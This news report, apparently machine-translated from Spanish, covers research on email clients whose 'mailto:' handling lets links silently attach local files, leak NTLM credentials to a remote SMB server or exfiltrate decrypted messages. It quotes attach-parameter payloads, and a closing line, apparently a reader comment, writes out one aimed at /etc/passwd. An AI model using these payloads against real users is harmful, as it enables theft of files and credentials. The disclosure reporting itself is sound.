Researchers from the Ruhr University in Bochum, Germany, analyzed the behavior of email clients when handling "mailto:" links with extended parameters.
In which five of the twenty clients de correo electrónico that they analyzed were vulnerable to a surrogate manipulation attack of resources using the "attach" parameter.
Six clients email more were affected by the PGP and S / MIME key replacement attack, and three clients were vulnerable to the attack to retrieve the content of the encrypted messages.
The "mailto:" links are used to automate the opening of a mail client in order to write an email to the recipient specified in the link. In addition to the address, as part of the link, you can specify additional parameters, such as the subject line and template for typical content.
The proposed attack manipulate the "attach" parameter to attach a file to the generated email.
Of the email clients analyzed, the following are mentioned:
Mail clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM / HCL Notes (CVE-2020-4089) and Pegasus Mail they were vulnerable to a trivial attack that automatically attached any specified local file Through a link like "mailto:? attach = path_to_file".
The file is attached without prior notice, therefore, without special emphasis, the user may not notice that in the mail it will be sent with the attachment.
This flaw can be exploited in a fairly simple way, since to obtain program-specific files, you don't need to do much, other than just specify the path. For example, it can be used to obtain cryptocurrency portfolios or from a database or something of interest.
In addition to local files, some email clients process links to network storage and paths on the IMAP server.
En particular, IBM Notes allows you to transfer a file from a network directory when processing links such as "attach = \\ site.com \ file", as well as intercepting NTLM authentication parameters by sending a link to an attacker-controlled SMB server (the request will be sent with the current user authentication parameters).
In the special case of Thunderbird, this successfully handles requests to attach folder content on the IMAP server.
At the same time, the messages extracted from IMAP, encrypted using OpenPGP and S / MIME, are automatically decrypted by the mail client before sending them.
Thunderbird developers were notified of the issue in February and the issue has now been fixed in Thunderbird 78 (Thunderbird branches 52, 60, and 68 are still vulnerable).
Previous versions of Thunderbird were also vulnerable to two other attack options for PGP and S / MIME proposed by the researchers.
Although Thunderbird removed the mailto :? Attach, still seems to be present in distributions that apply xdg-email to parse mailto URLs.
Specifically, Thunderbird, as well as OutLook, PostBox, eM Client, MailMate and R2Mail2, were able to perform a key change attack, caused by the fact that the mail client automatically imports and installs new certificates transmitted in S / MIME messages, which allows an attacker to organize substitution of public keys already stored by the user.
The second attack, to which they are exposed Thunderbird, PostBox and MailMate, manipulate the features of the autosave mechanism of draft messages and allows you to use the mailto parameters to initiate decryption of encrypted messages or add a digital signature for arbitrary messages, with the subsequent transfer of the result to the attacker's IMAP server.
In this attack, the ciphertext is transmitted through the "body" parameter and the "meta refresh" tag is used to initiate a call to the attacker's IMAP server.
For automatic processing of "mailto:" links without user intervention, specially designed PDF documents can be used: OpenAction in PDF allows you to automatically start the mailto driver when you open a document.
Finally if you are interested in knowing more about it on the subject, you can consult the research file In the following link.
malito: mishuevos@gmail.com? attatch = / etc / passwd send me e-mail